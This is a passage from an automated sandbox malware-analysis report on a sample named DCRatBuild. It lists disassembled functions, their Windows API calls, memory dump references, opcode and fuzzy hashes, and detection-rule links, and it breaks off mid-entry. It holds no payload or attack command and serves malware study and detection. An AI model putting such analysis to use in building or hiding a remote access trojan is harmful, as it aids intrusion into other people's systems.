                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ErrorLast$FileHandleRead
                                        • String ID:
                                        • API String ID: 2244327787-0
                                        • Opcode ID: 4950f23b6d81a6628367289e005ebd9a71cb7adae667c08a8f3263d5d0a31ea5
                                        • Instruction ID: 980d0007d3489d23b2db4ce24b083c8a08b2ffd560f0d5542ad64150b02ffb76
                                        • Opcode Fuzzy Hash: 4950f23b6d81a6628367289e005ebd9a71cb7adae667c08a8f3263d5d0a31ea5
                                        • Instruction Fuzzy Hash: 1C11AC32904204EBFB205F55C804AE977A9EB82730F10C12AFA2A85682D7FD9E44DF51
                                        Function 0075A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00753713,00000000,00000000,?,0075A49B,00753713,00000000,00000000,00000000,?,0075A698,00000006,FlsSetValue), ref: 0075A526
                                        • GetLastError.KERNEL32(?,0075A49B,00753713,00000000,00000000,00000000,?,0075A698,00000006,FlsSetValue,00767348,00767350,00000000,00000364,?,00759077), ref: 0075A532
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0075A49B,00753713,00000000,00000000,00000000,?,0075A698,00000006,FlsSetValue,00767348,00767350,00000000), ref: 0075A540
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: c45c78084096087d977697a43c8438324f695f3c55205324bdaa656c04c02f1c
                                        • Instruction ID: f21ce09c112747798c6100370eed7008635772487130ddf7eace763fcaaf5f79
                                        • Opcode Fuzzy Hash: c45c78084096087d977697a43c8438324f695f3c55205324bdaa656c04c02f1c
                                        • Instruction Fuzzy Hash: 3501FC32611326BBCB218A689C44E967B58AF457A27214730FD07D7140E7BDD914CAD5
                                        Function 0075B188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00758FA5: GetLastError.KERNEL32(?,00770EE8,00753E14,00770EE8,?,?,00753713,00000050,?,00770EE8,00000200), ref: 00758FA9
                                          • Part of subcall function 00758FA5: _free.LIBCMT ref: 00758FDC
                                          • Part of subcall function 00758FA5: SetLastError.KERNEL32(00000000,?,00770EE8,00000200), ref: 0075901D
                                          • Part of subcall function 00758FA5: _abort.LIBCMT ref: 00759023
                                          • Part of subcall function 0075B2AE: _abort.LIBCMT ref: 0075B2E0
                                          • Part of subcall function 0075B2AE: _free.LIBCMT ref: 0075B314
                                          • Part of subcall function 0075AF1B: GetOEMCP.KERNEL32(00000000,?,?,0075B1A5,?), ref: 0075AF46
                                        • _free.LIBCMT ref: 0075B200
                                        • _free.LIBCMT ref: 0075B236
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: _free$ErrorLast_abort
                                        • String ID: v
                                        • API String ID: 2991157371-2951754918
                                        • Opcode ID: 11cf73dd9e8203683a57fc706194d15b768a88c52e89b640c1ffe9a0cacd8d24
                                        • Instruction ID: 5594b1d45accd225e391c5a7ecde7c07ffe72fb649bcd7853612246c4e7f2ee2
                                        • Opcode Fuzzy Hash: 11cf73dd9e8203683a57fc706194d15b768a88c52e89b640c1ffe9a0cacd8d24
                                        • Instruction Fuzzy Hash: 4931E431904248EFDB50AF58C845AED77E0EF40322F204099ED049B291EBB95D49CB61
                                        Function 00739F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,0073CC94,00000001,?,?,?,00000000,00744ECD,?,?,?), ref: 00739F4C
                                        • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00744ECD,?,?,?,?,?,00744972,?), ref: 00739F8E
                                        • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,0073CC94,00000001,?,?), ref: 00739FB8
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FileWrite$Handle
                                        • String ID:
                                        • API String ID: 4209713984-0
                                        • Opcode ID: fa9816adcd0c6a30d1bfe7ee2cc2157a3c28d74a789b2d0e1443eda088578a69
                                        • Instruction ID: 469c6722756d695dc9d2522e3d134d2cb40ffa9db2a000ee39b3ccedcfb036a5
                                        • Opcode Fuzzy Hash: fa9816adcd0c6a30d1bfe7ee2cc2157a3c28d74a789b2d0e1443eda088578a69
                                        • Instruction Fuzzy Hash: 02310471608306ABEF148F14D948B6ABBA4EB50750F048558F985DA183D7B9DD48CBA2
                                        Function 0073A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A22E
                                        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A261
                                        • GetLastError.KERNEL32(?,?,?,?,0073A113,?,00000001,00000000,?,?), ref: 0073A27E
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CreateDirectory$ErrorLast
                                        • String ID:
                                        • API String ID: 2485089472-0
                                        • Opcode ID: 9637ba6fce0f7d6a133377114f02c40df10305b9e22c9c6df95245f4a28c77b7
                                        • Instruction ID: 14f329e17ffc9b2857da8ddc28a2048f6665f5186e92375f7a0aa3ed06e3059a
                                        • Opcode Fuzzy Hash: 9637ba6fce0f7d6a133377114f02c40df10305b9e22c9c6df95245f4a28c77b7
                                        • Instruction Fuzzy Hash: 3D018C31540218B6FB32ABA44C0BFEB7358BF4A781F044455F981D6093DBAE8A81C6A7
                                        Function 0075AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0075B019
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Info
                                        • String ID:
                                        • API String ID: 1807457897-3916222277
                                        • Opcode ID: a3a745e41fea986707b30a4c08e1440c6e85a2f6843308b8cb5e055547269282
                                        • Instruction ID: ba26c10f0646e1d6fe2276f7b873c43802acbf79a14443d412e3492cca64dbcb
                                        • Opcode Fuzzy Hash: a3a745e41fea986707b30a4c08e1440c6e85a2f6843308b8cb5e055547269282
                                        • Instruction Fuzzy Hash: 6E41087050478C9ADF218E248C95BF7BBA9EB45305F2404EDE99E87182E3799A49CF60
                                        Function 0075A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0075A79D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: String
                                        • String ID: LCMapStringEx
                                        • API String ID: 2568140703-3893581201
                                        • Opcode ID: 9f25de94a860a83d142d8b73fad5f01009a881646fe059c2dd4457b88cb0256a
                                        • Instruction ID: e2a7edd9611566233429ad88a7eb254dca955ce35906d0855c980546c4c2413c
                                        • Opcode Fuzzy Hash: 9f25de94a860a83d142d8b73fad5f01009a881646fe059c2dd4457b88cb0256a
                                        • Instruction Fuzzy Hash: 6C010272540209BBCF065FA0DC05DEE3F66EB0D760F008224FE1525160CABA8931EB95
                                        Function 0075A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00759D2F), ref: 0075A715
                                        Strings
                                        • InitializeCriticalSectionEx, xrefs: 0075A6E5
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CountCriticalInitializeSectionSpin
                                        • String ID: InitializeCriticalSectionEx
                                        • API String ID: 2593887523-3084827643
                                        • Opcode ID: 5ff59aa3aca518b383ff7f6e0f72a030a884d8611cbe76bc6dbdc10bd9cb72dc
                                        • Instruction ID: 7752c7f7a5c9134132b35f276f8edd854b71eeba2b6bfb99cee4b8d8c5bc8c9c
                                        • Opcode Fuzzy Hash: 5ff59aa3aca518b383ff7f6e0f72a030a884d8611cbe76bc6dbdc10bd9cb72dc
                                        • Instruction Fuzzy Hash: 9FF0E27164520CFBCF056F65CC09CAE7F61FF49761B008264FC0A2A260DAB94E20EB95
                                        Function 0075A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Alloc
                                        • String ID: FlsAlloc
                                        • API String ID: 2773662609-671089009
                                        • Opcode ID: 7f45fdd87bacd79cf78b8e3cff1a536e9c30ea4aa034845b89165489d6a69e61
                                        • Instruction ID: aab94f563a166fd8ecdd601576bb6da54274b40bcb9ef3efe52f119777607a73
                                        • Opcode Fuzzy Hash: 7f45fdd87bacd79cf78b8e3cff1a536e9c30ea4aa034845b89165489d6a69e61
                                        • Instruction Fuzzy Hash: 49E05C7074535CBB82146B54CC05CADBB50DB15721B004224FC0767240DDFC0E00D2EA
                                        Function 0075329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • try_get_function.LIBVCRUNTIME ref: 007532AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: try_get_function
                                        • String ID: FlsAlloc
                                        • API String ID: 2742660187-671089009
                                        • Opcode ID: 91021ee668e2bad96ecb06618d644243e3d851cf3b3953d9658e5e926589189b
                                        • Instruction ID: 7608f0437febecb3be360da45a4934493795526d619ed223362849f19d77f88b
                                        • Opcode Fuzzy Hash: 91021ee668e2bad96ecb06618d644243e3d851cf3b3953d9658e5e926589189b
                                        • Instruction Fuzzy Hash: C9D02B61780F3CFA811032D0AC039EE7E048701FF3F450252FF0E1A19285ED490091E9
                                        Function 0074E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074E20B
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: 3Ro
                                        • API String ID: 1269201914-1492261280
                                        • Opcode ID: 9f92508fd3fe395b92688a8d131f5b88e1f548ba6f24580d7e2f3f7a7d3d5abb
                                        • Instruction ID: 11e8162cd7f5b4f79b07f295ac6a8ec15a5635f8e312abebaad06abd1a8634e7
                                        • Opcode Fuzzy Hash: 9f92508fd3fe395b92688a8d131f5b88e1f548ba6f24580d7e2f3f7a7d3d5abb
                                        • Instruction Fuzzy Hash: 24B012E126E001FC371C21047E1AC37031CD4C1B60330802BB616D44829B8D4D4E4032
                                        Function 0075B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0075AF1B: GetOEMCP.KERNEL32(00000000,?,?,0075B1A5,?), ref: 0075AF46
                                        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0075B1EA,?,00000000), ref: 0075B3C4
                                        • GetCPInfo.KERNEL32(00000000,0075B1EA,?,?,?,0075B1EA,?,00000000), ref: 0075B3D7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CodeInfoPageValid
                                        • String ID:
                                        • API String ID: 546120528-0
                                        • Opcode ID: 5cd1b9eea34a3139709572777997ecbe871ed4ca6f08f52fb6f65839e2c6ccce
                                        • Instruction ID: 696460f8cbe7cfa3589b97716ce7dcef69867b95f66c4c816eef022a07ce54f0
                                        • Opcode Fuzzy Hash: 5cd1b9eea34a3139709572777997ecbe871ed4ca6f08f52fb6f65839e2c6ccce
                                        • Instruction Fuzzy Hash: 145147709002869FDB348F71C8856FABBE5EF41311F18816ED8868B253E7BD954ACB91
                                        Function 00731385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00731385
                                          • Part of subcall function 00736057: __EH_prolog.LIBCMT ref: 0073605C
                                          • Part of subcall function 0073C827: __EH_prolog.LIBCMT ref: 0073C82C
                                          • Part of subcall function 0073C827: new.LIBCMT ref: 0073C86F
                                          • Part of subcall function 0073C827: new.LIBCMT ref: 0073C893
                                        • new.LIBCMT ref: 007313FE
                                          • Part of subcall function 0073B07D: __EH_prolog.LIBCMT ref: 0073B082
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 7f0629b9067d1f88e1eb6443276d69a0727f13525ee1d8ae80443558adf988a2
                                        • Instruction ID: b2dbc45e92e9df3232460fe6690724c53c64fe9e398e5a681e382a9a302d907a
                                        • Opcode Fuzzy Hash: 7f0629b9067d1f88e1eb6443276d69a0727f13525ee1d8ae80443558adf988a2
                                        • Instruction Fuzzy Hash: 8D4114B0805B40DEE724DF7984899E7FBE5FB18310F904A2ED6EE83282DB766554CB11
                                        Function 00731380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00731385
                                          • Part of subcall function 00736057: __EH_prolog.LIBCMT ref: 0073605C
                                          • Part of subcall function 0073C827: __EH_prolog.LIBCMT ref: 0073C82C
                                          • Part of subcall function 0073C827: new.LIBCMT ref: 0073C86F
                                          • Part of subcall function 0073C827: new.LIBCMT ref: 0073C893
                                        • new.LIBCMT ref: 007313FE
                                          • Part of subcall function 0073B07D: __EH_prolog.LIBCMT ref: 0073B082
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 952c51eed06c7bcf5416b2cef0f10a6904235368f91e63bf85c368207ddb3870
                                        • Instruction ID: 5bc075eda6470e37fc946ac5f054374fb71c7dd221882302cf8060e7538ba5b7
                                        • Opcode Fuzzy Hash: 952c51eed06c7bcf5416b2cef0f10a6904235368f91e63bf85c368207ddb3870
                                        • Instruction Fuzzy Hash: 8B4114B0805B40DEE724DF7984899E7FBE5FB18310F904A2ED6EE83282DB766554CB11
                                        Function 0073971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00739EDC,?,?,00737867), ref: 007397A6
                                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00739EDC,?,?,00737867), ref: 007397DB
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 63d64022e68b56484ce979a5c6f7c2cb8639b92476e83e2accb9776cfd3a615b
                                        • Instruction ID: 6dfd3b9ee4cc0d7d816748e9c17a8e9c60a10db1638b85fb79c4d4b1cbb0aac3
                                        • Opcode Fuzzy Hash: 63d64022e68b56484ce979a5c6f7c2cb8639b92476e83e2accb9776cfd3a615b
                                        • Instruction Fuzzy Hash: 9A21B6B1514744EEF7308F64C885BA7B7E8EB49764F00491DF6D5821D2C3B8AC498A61
                                        Function 00739D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00737547,?,?,?,?), ref: 00739D7C
                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00739E2C
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: File$BuffersFlushTime
                                        • String ID:
                                        • API String ID: 1392018926-0
                                        • Opcode ID: 9f3ce6bdc7700172099b08cb0ae371da2b19dd02cdf9d2685a1a8bf4cd8017f2
                                        • Instruction ID: ec61ca784f13287f558428b85c279cbcc20ca85dceaa36b8a8122bf2e608f7e0
